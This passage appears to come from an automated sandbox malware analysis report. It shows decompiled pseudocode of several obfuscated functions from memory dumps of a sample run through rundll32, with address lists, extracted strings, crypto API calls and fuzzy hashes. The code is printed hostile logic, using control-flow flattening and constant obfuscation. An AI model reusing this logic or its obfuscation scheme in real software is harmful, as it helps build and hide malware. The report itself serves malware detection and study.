				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0024B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002550F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00258F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00258F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x0024128a
0x00241291
0x00241298
0x0024129f
0x002412a0
0x002412a7
0x002412a8
0x002412a9
0x002412ae
0x002412b6
0x002412b9
0x002412c8
0x002412ca
0x002412d1
0x002412d4
0x002412d8
0x002412e0
0x002412e8
0x002412f0
0x002412f8
0x00241300
0x00241308
0x00241310
0x00241318
0x00241325
0x00241329
0x00241331
0x00241339
0x0024133d
0x00241345
0x0024134d
0x00241355
0x00241362
0x00241366
0x0024136e
0x00241376
0x00241381
0x00241382
0x00241388
0x00241390
0x00241398
0x002413a0
0x002413a5
0x002413a9
0x002413b1
0x002413b9
0x002413be
0x002413c6
0x002413ce
0x002413d3
0x002413db
0x002413eb
0x002413ef
0x002413f3
0x002413fb
0x00241403
0x0024140b
0x00241413
0x0024141b
0x00241423
0x00241432
0x00241433
0x00241447
0x0024144b
0x00241453
0x00241453
0x0024145d
0x0024152a
0x0024152c
0x00241463
0x00241469
0x002414cd
0x00000000
0x0024146b
0x0024146d
0x002414be
0x002414c3
0x002414c6
0x00000000
0x0024146f
0x00241475
0x00000000
0x0024147b
0x00241493
0x00241498
0x0024149d
0x002414a3
0x00000000
0x002414a3
0x0024149d
0x00241475
0x0024146d
0x00241469
0x00241530
0x0024153b
0x0024153b
0x002414e6
0x002414eb
0x002414ee
0x002414f0
0x002414fc
0x00000000
0x002414f2
0x002414f2
0x00000000
0x002414f2
0x00000000
0x00241501
0x00241501
0x00241501
0x00000000

Strings

0Z, xrefs: 0024136E
uI, xrefs: 00241423
zR, xrefs: 002412AE
uz, xrefs: 00241390
5f:, xrefs: 00241366
c;, xrefs: 002413F3

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: 92b09c59e0a263b70223d4198e6096a45d8195de7488b21e2ce8a0e6eaf4e403
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: 45617571118341AFD758CF20C98591FBBE1FBC9748F80991DF196862A0D7B9CA588F43

Uniqueness

Uniqueness Score: -1.00%

Function 002417AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002417AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00251AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00250729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0024F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00254F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x002417b3
0x002417ba
0x002417bb
0x002417bc
0x002417c0
0x002417c4
0x002417c6
0x002417cb
0x002417d3
0x002417dc
0x002417de
0x002417e5
0x002417ea
0x002417f0
0x002417fc
0x00241801
0x00241807
0x0024180f
0x0024181c
0x0024181f
0x0024182b
0x0024182f
0x00241837
0x0024183f
0x00241847
0x0024184f
0x00241853
0x0024185b
0x00241863
0x0024186b
0x00241873
0x0024187b
0x00241883
0x0024188b
0x00241890
0x00241898
0x002418a5
0x002418a6
0x002418aa
0x002418af
0x002418b7
0x002418bf
0x002418c4
0x002418cc
0x002418d9
0x002418e3
0x002418e7
0x002418ec
0x002418f4
0x002418fc
0x00241901
0x00241906
0x0024190e
0x00241916
0x0024191e
0x00241926
0x00241933
0x0024193b
0x00241948
0x0024194c
0x00241954
0x0024195c
0x00241964
0x0024196c
0x00241970
0x00241982
0x00241a1a
0x00000000
0x00241988
0x0024198a
0x00241a03
0x00241a08
0x00241a0b
0x00241a12
0x00000000
0x0024198c
0x00241992
0x002419d5
0x002419d7
0x00000000
0x002419d7
0x00241994
0x0024199a
0x00241a3b
0x00241a41
0x00000000
0x00000000
0x002419a0
0x002419a8
0x002419ad
0x002419b2
0x002419b8
0x00000000
0x002419b8
0x002419b2
0x0024199a
0x00241992
0x0024198a
0x00241a50
0x00241a50
0x00241a30
0x00241a36
0x00000000

Strings

N9, xrefs: 002418C4
6:L7, xrefs: 0024193B
pEI4, xrefs: 002419B8
$z, xrefs: 0024180F
>, xrefs: 00241883
pEI4, xrefs: 0024198C

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: 2a331e18fddc372368b7408baa0b1563203c2860b822611f8ff5dc1be6ba8f15
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: 2D6154711183419FD358CE65D88581FBBE5BFC8358F404A1DF1A696260C3B5CAAACF87

Uniqueness

Uniqueness Score: -1.00%

Function 002520C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002520C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0025889D(0x25c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x25ca2c; // 0x2c8300
							_t108 = _t150 + 0x230; // 0x77004d
							E0024C680(_t108, _v592, _v580, _t134, _v588,  *0x25ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00252025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00252B16(_v548,  &_v524, E002584CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002428CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x002520cb
0x002520d1
0x002520d8
0x002520dd
0x002520e2
0x002520ea
0x002520f2
0x002520f7
0x002520ff
0x00252107
0x0025210f
0x00252117
0x0025211f
0x0025212d
0x00252132
0x00252138
0x00252145
0x0025215c
0x0025215f
0x00252163
0x0025216b
0x00252173
0x0025217b
0x00252183
0x00252188
0x00252190
0x0025219d
0x002521a1
0x002521a9
0x002521b1
0x002521b9
0x002521be
0x002521c6
0x002521ce
0x002521d6
0x002521de
0x002521e6
0x002521f6
0x002521fa
0x00252202
0x0025220a
0x00252212
0x0025221a
0x00252222
0x0025222a
0x00252232
0x0025223a
0x0025223f
0x00252247
0x00252253
0x00252256
0x0025225a
0x00252262
0x0025226a
0x0025226f
0x00252277
0x00252277
0x00252285
0x002522ae
0x002522bb
0x002522c0
0x002522dc
0x002522e6
0x002522ec
0x002522f1
0x00252302
0x00252309
0x00000000
0x00252287
0x00252289
0x00252339
0x0025228f
0x00252291
0x00000000
0x00252293
0x0025229f
0x002522a7
0x002522aa
0x00000000
0x002522aa
0x00252291
0x00252289
0x00252341
0x00252348
0x00252348
0x00252310
0x00252312
0x00252312
0x00252312
0x00000000

Strings

$&m, xrefs: 002521DE
-Q, xrefs: 002521E6
-Y, xrefs: 00252190
Bv, xrefs: 0025226F
&, xrefs: 00252173
Ov, xrefs: 00252145

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: bb484e3e95cd45a7f7fe57fd15d366127c8458890c395ea717b5776a3ba604e8
Instruction ID: ffd31084e32d42cddc5db7090a515e0c20be41014d69c45902d06e9bf6f91ec3
Opcode Fuzzy Hash: bb484e3e95cd45a7f7fe57fd15d366127c8458890c395ea717b5776a3ba604e8
Instruction Fuzzy Hash: 04517871118341AFD358CF21C88A91BBBF1FBC5328F509A1DF985862A0C7B58959CF86

Uniqueness

Uniqueness Score: -1.00%

Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
CoTaskMemAlloc.OLE32(?), ref: 10002227
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
CoTaskMemFree.OLE32(00000000), ref: 1000227A

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
String ID:
API String ID: 2967290590-0
Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00246754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00246754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x25ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x25ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0024F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002488E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x25c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00248736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0024568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00246754
0x0024675a
0x0024675f
0x00246767
0x0024676f
0x00246777
0x0024677c
0x00246784
0x0024678c
0x00246794
0x0024679c
0x002467a4
0x002467a9
0x002467b1
0x002467b8
0x002467bc
0x002467cb
0x002467cf
0x002467d1
0x002467db
0x002467e3
0x002467e5
0x002467ed
0x002467f2
0x002467fa
0x00246809
0x0024680c
0x00246810
0x0024681d
0x00246821
0x00246829
0x00246839
0x0024683d
0x00246842
0x0024684a
0x00246852
0x00246857
0x0024685f
0x00246867
0x0024686b
0x00246877
0x0024687a
0x0024687e
0x00246882
0x0024688a
0x00246892
0x00246897
0x0024689c
0x002468a4
0x002468a4
0x002468b2
0x00246984
0x00246987
0x0024698c
0x0024698f
0x00000000
0x0024698f
0x002468be
0x002468c6
0x00000000
0x00246981
0x002468d2
0x00000000
0x002468d8
0x002468de
0x002468e6
0x002468f0
0x002468f8
0x002468f9
0x00000000
0x002468f9
0x0024699f
0x0024699f
0x0024699f
0x0024690d
0x00246911
0x00246912
0x00246917
0x0024691a
0x0024691d
0x0024691f
0x00000000
0x0024691f
0x00000000
0x0024691d
0x00246929
0x0024692a
0x00246934
0x00246935
0x00246939
0x0024693b
0x0024693f
0x00246943
0x00246945
0x0024694a
0x0024694f
0x0024695b
0x00000000
0x00246951
0x00246951
0x00000000
0x00246951
0x00000000
0x00246960
0x00246960
0x00000000

Strings

zA, xrefs: 00246882
r<-$, xrefs: 0024691F
u, xrefs: 0024688A
:z, xrefs: 0024677C
r<-$, xrefs: 002468CC

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: dc0507888cd3e1314e9ef00e9d71de6921b7849abb6c5a0a85bb9d0657e5548d
Instruction ID: 4a52d10b3d7033ae235d6f8bf41a0f2732ac50070cb4a10210c22b37a7368f43
Opcode Fuzzy Hash: dc0507888cd3e1314e9ef00e9d71de6921b7849abb6c5a0a85bb9d0657e5548d
Instruction Fuzzy Hash: B05188715183029FD318CF26C94961FBBE0EBC9758F104A1DF4D8A62A0D7B48A19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0024839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00258C8F(_t189);
				_t217 = _v28 + E00258C8F(_t189) % _v52;
				_t184 = _v20 + E00258C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0024D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}

0x002483a0
0x002483aa
0x002483b2
0x002483b7
0x002483bf
0x002483d1
0x002483d5
0x002483dc
0x002483df
0x002483e3
0x002483e8
0x002483f0
0x002483fd
0x00248401
0x00248406
0x0024840e
0x00248416
0x0024841e
0x00248426
0x0024842e
0x00248436
0x0024843e
0x00248446
0x0024844e
0x00248456
0x0024845e
0x00248466
0x0024846e
0x00248476
0x0024847e
0x00248483
0x00248490
0x00248494
0x0024849c
0x002484a8
0x002484ad
0x002484b3
0x002484bb
0x002484c3
0x002484cb
0x002484d0
0x002484d8
0x002484e0
0x002484e8
0x002484f0
0x002484f8
0x00248500
0x00248508
0x00248510
0x00248515
0x0024851d
0x00248525
0x00248531
0x00248536
0x0024853c
0x00248544
0x00248551
0x00248552
0x0024855c
0x00248560
0x00248568
0x00248570
0x00248578
0x00248580
0x00248584
0x0024858c
0x002485a1
0x002485c2
0x002485d9
0x002485dd
0x002485e2
0x002485e4
0x002485e6
0x002485ee
0x002485f0
0x002485f2
0x002485f5
0x0024860f
0x00248619
0x00248623

Strings

H', xrefs: 002483E8
o9, xrefs: 00248584
Qv, xrefs: 0024853C
BQ{*, xrefs: 0024841E
KB, xrefs: 00248500

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BQ{*$H'$KB$Qv$o9
API String ID: 0-3657823386
